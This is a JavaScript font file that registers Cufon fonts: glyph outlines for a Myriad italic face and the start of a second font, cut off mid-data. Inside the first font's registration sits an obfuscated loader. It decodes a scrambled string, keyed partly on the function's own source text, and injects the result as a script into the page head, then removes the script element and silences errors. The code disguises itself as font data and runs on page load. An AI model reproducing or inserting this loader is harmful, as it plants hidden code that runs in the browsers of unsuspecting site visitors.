Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"58,-243r32,0r-19,102r114,0r20,-102r32,0r-46,243r-32,0r21,-113r-115,0r-21,113r-32,0","w":234},{"d":"42,0r-31,0r49,-256r31,0","w":85},{"d":"175,-75v2,70,-89,87,-163,73r45,-237v56,-13,132,-6,131,50v-1,31,-26,53,-53,60v23,8,40,25,40,54xm70,-140v44,3,81,-8,85,-46v3,-31,-41,-37,-70,-31xm142,-76v-1,-36,-37,-43,-77,-40r-17,91v47,6,95,-6,94,-51","w":192,"k":{"y":-3,"V":2,"U":3,"T":5,".":4,",":5}},{"d":"48,-174v6,-60,39,-97,98,-82r-7,26v-38,-14,-56,16,-59,56r38,0r-4,25r-39,0r-29,149r-31,0r28,-149r-23,0r4,-25r24,0","w":105,"k":{"}":-28,"t":-2,"]":-28,";":-11,":":-11,".":9,",":11,")":-28,"'":-15,"\"":-15}},{"d":"112,-178v43,0,72,31,72,74v0,56,-44,108,-99,108v-43,0,-71,-32,-72,-73v-1,-58,43,-109,99,-109xm109,-153v-38,0,-64,44,-64,83v0,28,16,49,43,49v35,0,63,-46,63,-83v0,-26,-15,-49,-42,-49","w":195,"k":{"z":3,"y":4,"x":4,"w":3,"v":4,".":5,",":7}},{"d":"28,-86r0,-20r161,-86r0,26r-134,71r134,69r0,26","w":214},{"d":"84,-100v64,25,29,104,-35,104v-18,0,-33,-4,-45,-12r9,-24v30,25,91,5,66,-33v-16,-15,-57,-33,-52,-59v-3,-46,65,-68,103,-45r-9,24v-44,-35,-90,24,-37,45","w":138,"k":{".":4,",":5}},{"d":"185,-171v-18,106,-22,89,-24,171r-30,0v-1,-7,3,-27,3,-46v-17,33,-41,50,-70,50v-30,0,-52,-26,-52,-59v0,-82,83,-147,173,-116xm45,-60v0,45,44,47,69,16v21,-26,28,-66,35,-106v-57,-17,-104,39,-104,90","w":194},{"d":"136,0v-8,-26,4,-114,-45,-105r-28,0r-19,105r-32,0r46,-239v55,-13,134,-5,134,53v0,36,-29,61,-58,71v16,6,25,22,27,48v3,41,6,63,8,67r-33,0xm159,-181v2,-36,-40,-43,-74,-36r-17,88v49,5,89,-11,91,-52","w":194,"k":{"y":-5,"t":-6,"i":-3,"h":-3,"Y":5,"W":-4,"T":2,"Q":-3,"O":-3,"G":-3,"C":-3,"A":-2,"-":2}},{"d":"42,0r-31,0r48,-256r32,0r-30,161r79,-79r40,0r-78,71r54,103r-35,0r-44,-85r-22,20","w":170,"k":{"y":-4,"w":-4,"r":-3,"p":-3,"o":5,"n":-3,"m":-3,"l":-3,"i":-3,"h":-2,"g":5,"e":5,"a":5}},{"d":"247,-145v0,71,-39,122,-91,141v29,6,51,10,66,12r-11,27v-34,-7,-79,-23,-107,-31v-51,-4,-87,-44,-86,-102v2,-83,50,-147,132,-149v60,-1,97,43,97,102xm146,-220v-54,0,-96,66,-95,121v1,45,23,76,67,77v55,1,96,-65,95,-122v-1,-46,-21,-76,-67,-76","w":250,"k":{"Y":13,"X":8,"W":2,"V":4,"T":11}},{"d":"12,-61v2,-75,64,-134,142,-111r16,-84r32,0r-39,201v-4,18,-6,37,-7,55r-29,0v1,-11,6,-26,4,-35v-31,59,-121,49,-119,-26xm45,-65v0,45,43,55,70,24v22,-26,25,-66,34,-105v-53,-27,-104,27,-104,81","w":195,"k":{".":5,",":6}},{"d":"98,-192r23,0r0,85r78,0r0,22r-78,0r0,85r-23,0r0,-85r-78,0r0,-22r78,0r0,-85","w":214},{"d":"64,-243r36,119r79,-119r38,0r-106,142r-19,101r-32,0r19,-100r-49,-143r34,0","w":192,"k":{"}":-14,"v":10,"u":20,"t":9,"q":29,"o":26,"e":30,"d":30,"a":32,"]":-14,"Y":-6,"W":-10,"V":-12,"T":-12,"S":4,"Q":10,"O":10,"G":10,"C":10,"A":31,";":9,":":7,".":30,"-":2,",":30,")":-14}},{"d":"42,0r-31,0r30,-174r28,0v-1,16,-5,30,-4,38v16,-31,33,-46,64,-41r-7,31v-65,-4,-66,88,-80,146","w":118,"k":{"z":-3,"y":-9,"x":-4,"w":-8,"v":-9,"t":-7,"g":2,"f":-8,"a":5,";":-5,":":-7,".":13,"-":2,",":13}},{"d":"57,-169v12,0,21,9,21,22v0,14,-9,25,-24,25v-12,0,-21,-10,-21,-22v0,-13,10,-25,24,-25xm9,42r-25,2v15,-29,27,-58,36,-87r38,-4v-15,35,-32,65,-49,89","w":78,"k":{" ":9}},{"d":"175,0r-34,0r-41,-102v-15,23,-39,57,-72,102r-39,0r97,-123r-47,-120r33,0r38,99v22,-35,47,-67,72,-99r38,0r-96,120","w":194,"k":{"y":5,"u":4,"e":5,"a":5,"Y":-10,"X":-6,"W":-9,"V":-10,"T":-9,"Q":10,"O":10,"G":10,"C":10,"A":-2}},{"d":"161,-194v-28,-20,-87,-16,-85,23v1,24,13,29,36,39v73,31,43,126,-26,127r-7,36r-23,0r7,-36v-19,-1,-36,-7,-50,-17r11,-24v30,26,96,21,98,-23v0,-16,-10,-31,-32,-39v-75,-29,-52,-118,18,-122r7,-35r23,0r-7,35v16,1,30,6,41,13"},{"d":"67,40v-77,9,-40,-76,-31,-115v0,-13,-8,-19,-24,-19r3,-19v74,0,-7,-143,107,-134v-3,7,2,21,-11,21v-58,-2,-14,119,-70,123v44,11,2,81,2,100v0,18,10,25,28,23","w":104,"k":{"Y":-14,"W":-18,"V":-18,"T":-20,"J":-4}},{"d":"42,0r-31,0r33,-174r32,0xm71,-248v11,0,19,9,19,20v0,12,-9,23,-22,22v-11,0,-19,-9,-19,-20v0,-12,9,-23,22,-22","w":85},{"d":"72,40r-65,0r55,-287r65,0r-4,20r-39,0r-48,247r40,0","w":104,"k":{"Y":-14,"W":-18,"V":-18,"T":-20,"J":-4}},{"d":"15,-35v42,28,109,4,109,-45v0,-40,-39,-50,-86,-43r33,-111r109,0r-5,28r-83,0r-18,57v45,-5,83,18,83,62v0,74,-90,114,-152,77"},{"d":"44,0r-23,0r22,-70r-30,0r4,-22r33,0r16,-52r-31,0r3,-22r35,0r22,-68r21,0r-21,68r33,0r22,-68r21,0r-21,68r30,0r-3,22r-34,0r-16,52r32,0r-4,22r-35,0r-22,70r-22,0r22,-70r-33,0xm72,-92r33,0r16,-52r-33,0"},{"w":66,"k":{"Y":12,"W":8,"V":8,"T":12}},{"d":"55,-169v12,0,22,9,22,22v0,13,-11,25,-24,25v-12,0,-21,-10,-21,-22v0,-14,9,-25,23,-25xm31,-43v12,0,21,10,21,22v0,13,-10,26,-24,25v-12,0,-21,-10,-21,-22v0,-13,10,-26,24,-25","w":78,"k":{" ":11}},{"d":"71,-94v-29,0,-46,-23,-46,-53v-1,-43,27,-92,69,-91v28,0,45,21,45,49v0,48,-25,95,-68,95xm75,-114v24,-1,38,-44,38,-73v0,-18,-6,-31,-22,-31v-25,0,-41,43,-40,72v0,21,9,32,24,32xm71,4r-23,0r178,-242r22,0xm205,3v-29,0,-46,-24,-46,-53v-1,-43,28,-92,69,-91v28,0,45,21,45,49v0,48,-25,94,-68,95xm209,-17v24,-1,38,-44,38,-73v0,-21,-7,-31,-22,-31v-25,0,-39,43,-39,72v0,21,8,32,23,32","w":285},{"d":"65,-105v-13,1,-21,13,-21,29r-22,0v-1,-33,15,-52,43,-54v20,-1,74,31,93,31v13,0,19,-10,19,-30r23,0v1,37,-14,52,-43,55v-21,2,-72,-32,-92,-31","w":214},{"d":"-4,-30v44,17,74,-6,83,-52r31,-161r31,0v-19,74,-18,177,-58,228v-17,22,-66,24,-94,12","w":136,"k":{"}":-12,"y":-5,"]":-12,")":-12}},{"d":"149,-76r-86,0r-39,76r-34,0r128,-243r38,0r36,243r-33,0xm75,-102r72,0r-16,-113v-23,53,-34,68,-56,113","w":211,"k":{"z":-7,"y":8,"x":-7,"w":10,"v":11,"r":-3,"q":4,"o":4,"j":-3,"i":-3,"g":4,"e":4,"d":4,"c":4,"b":2,"Y":25,"W":15,"V":22,"U":10,"T":29,"Q":8,"O":8,"G":8,"C":9,"-":2}},{"d":"11,42r-26,0v70,-85,97,-182,55,-291r24,0v47,103,19,212,-53,291","w":104},{"d":"31,-43v12,0,23,9,22,22v0,14,-10,25,-25,25v-12,0,-20,-9,-20,-22v0,-14,9,-25,23,-25","w":78,"k":{" ":22}},{"d":"52,-248r35,0r25,52r-23,0","w":140},{"d":"-17,27r180,0r-4,18r-180,0","w":180},{"d":"9,-55v-1,-37,28,-57,55,-71v-56,-37,-10,-112,52,-112v33,0,61,21,61,54v0,26,-17,45,-45,61v23,13,35,31,35,55v2,43,-42,72,-85,72v-41,0,-73,-22,-73,-59xm112,-214v-23,-1,-42,18,-42,40v0,18,11,32,35,39v43,-3,62,-77,7,-79xm84,-20v27,0,50,-18,50,-45v0,-22,-14,-38,-42,-47v-51,3,-72,90,-8,92"},{"d":"67,4v-83,0,-33,-119,-26,-178r32,0r-22,120v-1,40,44,37,64,13v27,-31,28,-86,39,-133r32,0r-32,174r-28,0v1,-10,6,-24,4,-33v-15,20,-34,37,-63,37","w":195,"k":{".":4,",":5}},{"d":"98,0r-36,0r-32,-243r32,0r25,210v33,-75,70,-139,106,-210r35,0","w":201,"k":{"}":-18,"y":3,"u":7,"r":3,"o":13,"e":13,"a":14,"]":-18,"S":-3,"A":23,";":6,":":5,".":22,"-":2,",":23,")":-18}},{"d":"156,-72v0,71,-98,97,-152,58r12,-26v34,27,107,23,107,-28v0,-54,-87,-47,-87,-107v0,-64,85,-90,136,-59r-11,26v-31,-22,-92,-13,-92,27v0,53,87,45,87,109","w":173,"k":{"y":5,"w":4,"v":5,"q":-4,"o":-4,"e":-4,"a":-3}},{"d":"73,4v-45,0,-61,-30,-52,-75r37,-185r31,0r-22,114v29,-56,118,-45,118,28v0,61,-49,118,-112,118xm152,-111v0,-22,-12,-41,-34,-41v-46,2,-67,59,-68,105v0,18,10,26,29,26v42,0,74,-49,73,-90","w":196,"k":{"y":4,"v":4,".":8,",":9}},{"d":"92,-210v0,27,-48,95,5,98r-3,18v-76,-2,9,143,-107,134v3,-7,-2,-20,10,-20v59,2,15,-118,71,-124v-44,-10,-1,-73,-2,-100v0,-18,-10,-23,-28,-22v3,-7,-2,-22,11,-21v25,2,43,12,43,37","w":104},{"d":"155,0r-16,-140v-26,63,-43,86,-70,140r-30,0r-17,-174r31,0v4,47,1,101,9,144v19,-50,48,-97,71,-144r28,0r15,144v19,-57,41,-93,63,-144r33,0r-87,174r-30,0","w":261,"k":{"y":-6,"v":-5,"o":2,"a":4,";":-3,":":-5,".":12,",":13}},{"d":"18,-174r33,0r23,141v25,-58,46,-89,72,-141r35,0r-99,174r-31,0","w":170,"k":{"y":-6,"w":-5,"q":5,"o":5,"e":5,"d":5,"c":5,"a":5,";":-5,":":-8,".":14,",":19}},{"d":"126,0r-30,0r12,-64r-104,0r4,-21r127,-149r35,0r-27,145r32,0r-5,25r-32,0xm43,-89r70,0r22,-114v-35,53,-56,70,-92,114"},{"d":"200,-122r-180,0r0,-22r180,0r0,22xm200,-50r-180,0r0,-22r180,0r0,22","w":214},{"d":"185,-113v2,72,-68,141,-144,109r-14,76r-32,0r45,-247r29,0r-5,34v14,-21,35,-36,65,-37v36,-1,56,29,56,65xm152,-111v0,-44,-48,-52,-73,-20v-19,24,-25,64,-33,100v52,34,106,-24,106,-80","w":196,"k":{"y":3,".":5,",":7}},{"d":"-13,53v28,-6,66,-42,67,-64r-37,-163r33,0v17,88,27,134,27,138r64,-138r34,0v-53,88,-83,223,-181,255","w":164,"k":{"w":-3,"v":-5,"q":3,"o":3,"g":3,"e":3,"d":3,"c":3,"a":5,";":-5,":":-5,".":14,"-":2,",":15}},{"d":"49,-234r145,0v-5,28,-4,19,-26,55r-116,179r-35,0r136,-207r-109,0"},{"d":"67,0r38,-202r-41,19r-3,-24v26,-10,41,-31,81,-27r-44,234r-31,0"},{"d":"12,-61v0,-83,88,-144,172,-106r-44,239r-32,0r20,-104v-12,19,-34,36,-62,36v-35,1,-54,-29,-54,-65xm45,-64v0,46,44,52,70,22v22,-26,26,-65,34,-105v-54,-25,-104,29,-104,83","w":195,"k":{".":5,",":5}},{"d":"67,-139v24,-48,112,-58,112,10v0,44,-15,87,-22,129r-31,0r21,-121v0,-41,-44,-37,-65,-12v-27,31,-28,86,-39,133r-32,0r31,-174r29,0","w":198},{"d":"156,-73v0,66,-97,100,-150,61r11,-25v38,28,106,13,106,-36v0,-33,-29,-42,-64,-40r5,-25v36,3,70,-13,71,-44v2,-39,-59,-32,-80,-15r-7,-24v42,-29,120,-22,121,34v0,32,-28,51,-53,61v24,5,40,25,40,53"},{"d":"121,-238v41,0,60,32,60,75v2,74,-37,167,-104,167v-44,0,-60,-35,-61,-82v-2,-74,40,-159,105,-160xm117,-212v-42,1,-70,85,-70,136v0,36,11,54,33,54v51,0,69,-85,69,-139v0,-35,-11,-51,-32,-51"},{"d":"23,-174r35,0v11,21,18,45,30,65v22,-32,31,-39,52,-65r37,0r-75,85r43,89r-35,0r-33,-69v-18,31,-33,44,-53,69r-37,0r78,-90","w":165,"k":{"y":-6,"w":-4,"v":-4,"t":-3,"q":6,"o":6,"e":6,"d":6,"c":6}},{"d":"35,-270r23,0r0,360r-23,0r0,-360","w":79},{"d":"150,-247v61,-1,97,42,97,102v0,82,-48,148,-131,149v-60,2,-99,-43,-98,-102v2,-82,51,-147,132,-149xm145,-220v-54,-1,-94,66,-94,120v0,45,23,77,68,77v52,0,94,-66,94,-121v0,-47,-22,-75,-68,-76","w":250,"k":{"y":-7,"w":-6,"v":-6,"u":-2,"t":-8,"s":-3,"r":-2,"q":-4,"p":-2,"o":-4,"n":-2,"m":-2,"l":-2,"k":-2,"j":-2,"i":-2,"h":-2,"g":-4,"f":-8,"e":-4,"d":-4,"c":-4,"b":-3,"Y":13,"X":12,"V":2,"T":11,"A":3,".":7,",":9}},{"d":"52,-103v0,65,63,95,119,71r13,-70r-50,0r5,-26r82,0r-22,117v-83,35,-181,3,-181,-89v0,-107,107,-172,212,-134r-10,27v-81,-35,-168,19,-168,104","w":233,"k":{"e":-3,"a":-3}},{"d":"174,-180v-8,80,-51,91,-122,153r100,0r-5,27r-147,0r4,-21v66,-54,86,-64,123,-113v21,-28,21,-78,-23,-77v-17,0,-33,5,-50,17r-8,-22v42,-36,134,-29,128,36"},{"d":"117,-238v93,5,73,131,25,188v-29,34,-67,54,-121,54r3,-27v64,1,101,-39,117,-85v-34,46,-114,27,-114,-36v0,-47,44,-96,90,-94xm96,-107v33,0,54,-19,54,-60v0,-28,-11,-45,-37,-45v-29,-1,-55,33,-53,64v0,23,13,41,36,41"},{"d":"52,-103v0,73,73,96,131,69r5,26v-75,32,-170,0,-170,-91v0,-106,105,-177,203,-135r-10,25v-76,-37,-159,24,-159,106","w":208,"k":{"z":-2,"y":4,"u":2,"o":2,"e":2,"a":3,"Q":9,"O":9,"G":9,"C":9}},{"d":"53,-71r-25,0r28,-172r36,0xm32,-43v12,0,21,10,21,22v1,13,-11,25,-24,25v-12,0,-21,-10,-21,-22v0,-13,10,-26,24,-25","w":86},{"d":"6,14r-25,0r145,-261r26,0","w":119},{"d":"171,-22v-43,45,-151,32,-143,-49v6,-62,21,-114,30,-172r31,0r-27,141v-10,41,2,81,44,79v43,-2,62,-34,70,-78r27,-142r32,0v-19,74,-20,175,-64,221","w":231,"k":{"y":-2,"v":-2,"f":-5,"b":-2,"A":6}},{"d":"12,0r46,-243r31,0r-21,118v34,-41,75,-79,112,-118r40,0r-105,105r65,138r-34,0r-56,-118r-30,27r-17,91r-31,0","w":192,"k":{"y":7,"w":8,"v":10,"u":4,"r":-4,"o":4,"n":-4,"l":-4,"i":-4,"h":-4,"e":4,"a":-2,"W":-8,"Q":8,"O":8,"G":8,"C":8,"A":-5}},{"d":"87,1v-26,8,-64,1,-61,-32v4,-43,14,-79,20,-118r-25,0r5,-25r25,0r6,-33r33,-9r-8,42r42,0r-5,25r-42,0r-19,109v-2,18,17,19,31,16","w":116,"k":{"y":-4,"w":-4,"v":-3,",":3}},{"d":"192,-68r-25,0r-59,-139r-59,139r-25,0r73,-166r23,0","w":214},{"d":"195,-106r0,21r-162,85r0,-26r135,-70r-135,-70r0,-26","w":214},{"d":"238,-145v0,112,-97,166,-226,144r45,-238v90,-17,181,4,181,94xm49,-26v89,14,155,-34,155,-118v0,-62,-56,-84,-119,-72","w":242,"k":{"y":-7,"u":-4,"o":-3,"e":-2,"Y":12,"V":3,".":9,",":10}},{"d":"120,-247v29,0,50,20,50,49v0,29,-22,50,-62,71v12,20,27,41,44,65v15,-17,27,-41,37,-72r30,0v-14,42,-32,73,-52,93v13,18,23,32,31,41r-37,0v-4,-5,-10,-12,-17,-22v-41,43,-138,34,-138,-35v0,-34,22,-58,61,-79v-32,-48,-1,-111,53,-111xm117,-225v-35,2,-44,52,-22,79v31,-14,46,-31,46,-51v0,-16,-8,-28,-24,-28xm39,-63v0,49,64,54,91,21v-23,-31,-39,-56,-51,-75v-27,16,-40,33,-40,54","w":218},{"d":"46,-68v0,47,50,56,86,36r3,25v-51,26,-122,6,-122,-57v0,-74,72,-138,148,-106r-9,25v-55,-27,-106,23,-106,77","w":158,"k":{"y":-4,"t":-2,"o":3,"e":3,"d":3,"a":5,".":4,",":5}},{"d":"148,-202v0,54,-70,78,-70,132r-31,0v0,-61,64,-77,68,-125v3,-33,-46,-29,-65,-15r-6,-23v37,-24,105,-18,104,31xm54,-43v12,0,22,9,22,22v0,14,-11,25,-25,25v-12,0,-20,-9,-20,-22v0,-14,9,-25,23,-25","w":142},{"d":"44,-249r33,0r-23,88r-21,0xm100,-249r32,0r-23,88r-20,0","w":113},{"d":"125,0v2,-48,53,-140,-6,-152v-62,8,-65,92,-77,152r-31,0r49,-256r31,0r-21,113v25,-45,110,-51,109,13v-1,49,-15,86,-22,130r-32,0","w":198},{"w":66,"k":{"Y":12,"W":8,"V":8,"T":12}},{"d":"-7,0r3,-19v59,-64,92,-99,97,-104v4,-5,16,-13,26,-25r-91,0r5,-26r130,0r-4,20v-84,89,-74,87,-122,127v30,4,67,0,99,1r-5,26r-138,0","w":155,"k":{"y":-9}},{"d":"46,-174r32,0r-33,173v-9,56,-30,84,-85,74r4,-25v30,9,43,-15,48,-43xm71,-248v11,0,19,9,19,20v0,12,-9,23,-22,22v-11,0,-19,-10,-19,-20v0,-12,10,-22,22,-22","w":84,"k":{".":4,",":5}},{"d":"46,-249r34,0r-23,88r-21,0","w":62},{"d":"82,4v-81,0,-80,-104,-46,-161v27,-47,73,-79,138,-81r-4,27v-60,-1,-102,42,-117,85v12,-15,36,-28,59,-29v36,-1,59,28,59,65v0,47,-42,94,-89,94xm100,-130v-32,0,-56,22,-56,60v0,27,14,48,40,48v51,0,82,-108,16,-108"},{"d":"48,42v-52,-99,-8,-229,53,-291r26,0v-70,82,-97,183,-55,291r-24,0","w":104,"k":{"Y":-14,"W":-18,"V":-18,"T":-20,"J":-4}},{"d":"162,-140r-6,27r-91,0r-16,86r103,0r-6,27r-134,0r46,-243r129,0r-6,27r-97,0r-14,76r92,0","w":175,"k":{"y":2,"w":3,"v":3,"q":2,"f":-2,"W":-3,"V":-3,",":3}},{"d":"192,-181v0,63,-61,96,-131,85r-18,96r-31,0r45,-239v58,-13,135,-6,135,58xm160,-179v0,-38,-42,-45,-76,-37r-18,93v47,10,94,-12,94,-56","w":188,"k":{"y":-6,"u":5,"t":-3,"s":4,"r":4,"o":7,"n":4,"l":2,"i":2,"h":2,"e":7,"a":7,"A":24,";":5,":":4,".":37,"-":2,",":39}},{"d":"83,0r-35,0r-13,-243r32,0r7,208v26,-69,63,-141,92,-208r35,0r7,207v27,-78,58,-135,89,-207r34,0r-115,243r-33,0r-8,-168v-1,-9,2,-26,0,-39v-28,84,-59,132,-92,207","w":307,"k":{"}":-14,"u":5,"r":5,"o":11,"m":5,"e":11,"d":11,"a":12,"]":-14,"T":-12,"Q":-2,"O":-2,"G":-2,"C":-2,"A":19,";":6,":":4,".":15,"-":2,",":23,")":-14}},{"d":"-7,0r4,-19r168,-197r-119,0r5,-27r162,0r-3,20r-167,196r132,0r-5,27r-177,0","w":196,"k":{"e":2,"Q":8,"O":8,"G":8,"C":8,"A":-2}},{"d":"41,-112v0,80,81,122,149,85r6,17v-79,40,-177,-9,-177,-99v0,-75,58,-138,134,-138v62,0,108,45,108,106v0,45,-26,83,-65,84v-19,0,-26,-14,-29,-32v-21,45,-92,43,-92,-14v0,-59,66,-105,126,-77r-14,84v0,14,5,20,14,20v24,-1,39,-33,39,-63v0,-54,-35,-91,-90,-91v-63,0,-109,52,-109,118xm100,-105v0,32,37,36,52,12v18,-19,17,-45,24,-72v-41,-14,-76,22,-76,60","w":265},{"d":"113,14r-25,0r-66,-261r25,0","w":120},{"d":"56,0r40,-215r-73,0r5,-28r180,0r-6,28r-73,0r-42,215r-31,0","w":177,"k":{"}":-20,"z":12,"y":13,"w":14,"u":14,"s":18,"r":14,"o":22,"m":14,"e":21,"a":22,"]":-20,"Y":-17,"X":-12,"W":-16,"V":-18,"T":-16,"S":-4,"Q":6,"O":6,"G":6,"C":6,"A":25,";":7,":":5,".":20,"-":2,",":20,")":-20}},{"d":"12,0r46,-243r128,0r-5,27r-97,0r-15,80r89,0r-5,27r-89,0r-21,109r-31,0","w":173,"k":{"y":7,"u":9,"r":8,"o":10,"l":6,"i":9,"e":11,"a":14,"A":23,";":6,":":4,".":31,"-":2,",":30}},{"d":"123,-247r21,13r-40,46r56,-7r-5,25v-17,-1,-37,-7,-53,-6r30,44r-24,13r-17,-51r-29,51r-20,-13r40,-45r-55,7r5,-25v16,1,36,7,51,6r-29,-45r24,-13v7,16,10,36,18,51","w":151},{"d":"42,0r-30,0r46,-243r36,0v27,68,59,130,80,204v4,-63,24,-142,34,-204r31,0r-46,243r-32,0v-27,-67,-62,-133,-81,-206r-2,0v-5,56,-25,147,-36,206","w":235},{"d":"252,0r-31,0r30,-213v-16,34,-30,61,-40,80r-72,131r-25,0r-18,-128v-4,-23,-4,-54,-9,-83r-52,213r-30,0r63,-243r42,0r27,199v30,-70,69,-133,103,-199r43,0","w":289,"k":{"y":-3,"j":-5,"i":-2}},{"d":"57,-243r32,0r-46,243r-32,0","w":86,"k":{"z":-3,"y":-2,"w":-2,"v":-2,"t":-2,"f":-3}},{"d":"18,-110r87,0r-5,25r-87,0","w":111},{"d":"44,-76v-11,54,54,66,93,42r4,24v-52,29,-129,13,-129,-57v0,-53,44,-111,98,-111v30,0,55,16,53,46v-4,54,-58,55,-119,56xm133,-132v-3,-30,-46,-26,-63,-7v-10,11,-18,24,-22,39v43,-1,80,-1,85,-32","w":168,"k":{".":4,",":6}},{"d":"12,0r46,-243r32,0r-41,215r101,0r-6,28r-132,0","w":165,"k":{"y":11,"w":11,"u":4,"o":4,"e":5,"Y":36,"W":24,"V":30,"U":18,"T":34,"Q":17,"O":17,"G":17,"C":17,"A":-4,"-":2}},{"d":"12,-62v-1,-88,88,-141,173,-104v-28,94,-7,245,-126,242v-23,0,-42,-4,-55,-13r9,-25v37,24,100,9,106,-30v2,-7,10,-26,11,-45v-15,24,-36,37,-62,37v-34,1,-56,-29,-56,-62xm46,-67v0,46,46,53,71,22v22,-26,24,-65,33,-102v-55,-24,-104,26,-104,80","w":195,"k":{".":5,",":6}},{"d":"9,42r-24,2v16,-31,28,-60,36,-87r37,-4v-15,34,-31,64,-49,89","w":78,"k":{" ":21}},{"d":"40,-247r64,0r-54,287r-65,0r4,-20r39,0r47,-247r-39,0","w":104},{"d":"237,-178v79,0,28,120,22,178r-31,0r21,-121v1,-40,-40,-37,-60,-13v-25,30,-28,89,-39,134r-31,0r22,-121v0,-40,-41,-36,-61,-11v-26,33,-27,86,-38,132r-31,0r31,-174r28,0v-1,10,-6,24,-4,33v23,-44,99,-55,105,2v16,-26,39,-39,66,-39","w":300}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+380-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("XH2RF-k_jEbcXw4)+-(>0H0bQPkR2-bcQP1>jEx@2AiyuM_d^Hqw2-ii6P(^jR(9XR4>VRe9tP4Fk^k6+8Nmu8N%1Q#X*^9cu(iY+A28u@RJ+~*b6?9J}Q(c}M:YOTb?}~4S0AmWArL_Q~#T1-},Qw1U0?K]1MuUxA:QE9:6Q(xHX9#k^^R48H6yQE_dD@kmFH4_Xw0dX^qK;8Ny6SRdD@NyFSRmD-q4F-+_jwq@;E0c2d#@F?4mj?}btJ_)jEuUud#WjM_WQde,V@+J+RmcX8iU;MKd2EqyuE1WFP1hu-A6D-kWFQqyFPkhFHhW6J*K1wbN:wST(H?01XD}kV;*x^8rAEQu2jF6+tOehd~94-@UK][yLcWmq>M_RPJY#%)ibp,KD@x46J*UFHb~uQxKFPYcjHbM+H#hFErKXE2W6de)j8qyV>y[j^4@EPkFjAR+;Q:FjARbX^eK")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":182,"face":{"font-family":"myriad","font-weight":400,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 11 5 3 3 4 3 9 2 4","ascent":"288","descent":"-72","x-height":"4","bbox":"-40 -270 331 90","underline-thickness":"18","underline-position":"-27","slope":"-11","unicode-range":"U+0020-U+007E"}}));
;
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * copyright 1994-1996, Jos Buivenga
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"135,-94v0,-25,-5,-65,-38,-65v-14,0,-31,9,-40,20r0,108v8,9,24,14,36,14v36,0,42,-50,42,-77xm163,-98v0,50,-16,103,-76,103v-19,0,-42,-9,-57,-21r0,-234r27,0r0,87v10,-12,29,-19,44,-19v44,0,62,47,62,84","w":181},{"d":"95,-22v11,21,5,27,-31,27v-17,0,-31,-10,-31,-40r0,-121r-24,-3r0,-17r25,0r0,-32r25,0r0,32r36,0r0,20r-35,0r0,120v-4,28,27,17,35,14","w":110},{"d":"173,0r-33,0r-54,-90r-51,90r-31,0r67,-116r-66,-111r32,0r50,83r48,-83r30,0r-63,109","w":177},{"d":"85,-16v54,0,42,-79,43,-137v-9,-4,-22,-7,-32,-7v-44,0,-50,44,-50,78v0,23,9,66,39,66xm158,5v-18,3,-29,-15,-28,-31v-5,21,-29,31,-49,31v-44,0,-63,-46,-63,-83v0,-52,17,-104,76,-104v12,0,22,3,34,6r0,-74r28,0r0,217v0,7,-1,20,9,21","w":184},{"d":"26,40v46,-4,88,-22,88,-68v0,-40,-46,-35,-81,-32r0,-21v29,-2,41,-21,61,-32v19,-10,23,-48,-7,-46v-13,0,-40,13,-52,20r-7,-19v32,-25,109,-42,109,18v0,28,-28,44,-50,56v29,0,54,19,54,50v0,66,-56,95,-115,94r0,-20"},{"d":"56,21v0,29,-25,41,-50,48r-6,-19v13,-5,30,-16,30,-32r0,-194r26,0r0,197xm22,-226v0,-24,40,-25,40,0v0,24,-40,25,-40,0","w":85},{"d":"67,-16v32,-2,46,-40,43,-74r-63,27v-11,18,-4,49,20,47xm163,-2v-21,16,-54,3,-52,-25v-6,21,-29,32,-50,32v-44,2,-57,-49,-35,-80r84,-36v2,-27,-2,-48,-28,-48v-18,0,-37,12,-48,25r-10,-16v25,-40,114,-49,114,16r0,110v-1,10,10,14,18,9","w":167},{"d":"162,27r0,22r-162,0r0,-22r162,0"},{"d":"159,-176v-15,59,-49,176,-87,220v-11,13,-26,19,-42,23r-6,-21v22,-6,37,-23,46,-43r-66,-179r29,0r41,115v4,12,8,24,10,36v20,-49,35,-100,48,-151r27,0","w":163,"k":{".":27,",":27}},{"d":"158,0r-27,0r0,-134v4,-44,-63,-18,-74,-7r0,141r-27,0r0,-176r27,0r0,13v12,-9,38,-19,57,-19v37,0,44,21,44,48r0,134","w":186},{"d":"182,-227r-74,227r-32,0r-74,-227r31,0r60,192r59,-192r30,0","w":183,"k":{"y":4,"u":11,"r":11,"o":9,"i":6,"e":9,"c":9,"a":11,"A":10,";":20,":":20,".":33,"-":13,",":33}},{"d":"158,0r-27,0r0,-134v3,-43,-62,-19,-74,-7r0,141r-27,0r0,-250r27,0r0,87v12,-9,38,-19,57,-19v37,0,44,21,44,48r0,134","w":186},{"d":"56,-227r0,203r78,0r0,24r-105,0r0,-227r27,0","w":137,"k":{"y":10,"Y":23,"W":13,"V":16,"T":20}},{"w":108},{"d":"93,-204r-36,0r0,181r34,0v48,0,57,-51,57,-89v0,-37,-7,-92,-55,-92xm94,-227v65,0,83,59,83,114v0,55,-22,113,-86,113r-62,0r0,-227r65,0","w":196},{"d":"45,-255v9,25,0,52,-3,79r-11,0v-3,-27,-12,-54,-3,-79r17,0xm95,-255v9,25,0,52,-3,79r-12,0v-2,-27,-10,-54,-3,-79r18,0","w":124},{"d":"120,53r-22,0r-94,-326r23,0","w":120},{"d":"140,-94v0,-25,-6,-66,-39,-66v-15,0,-32,11,-43,21v1,53,-10,123,43,123v34,0,39,-53,39,-78xm105,-182v44,0,63,47,63,84v0,42,-12,103,-65,103v-20,0,-37,-8,-45,-27r0,85r-28,0r0,-239r28,0r0,13v12,-11,31,-19,47,-19","w":185},{"d":"172,-227v-6,96,30,232,-72,232v-102,0,-65,-136,-72,-232r29,0r0,139v0,29,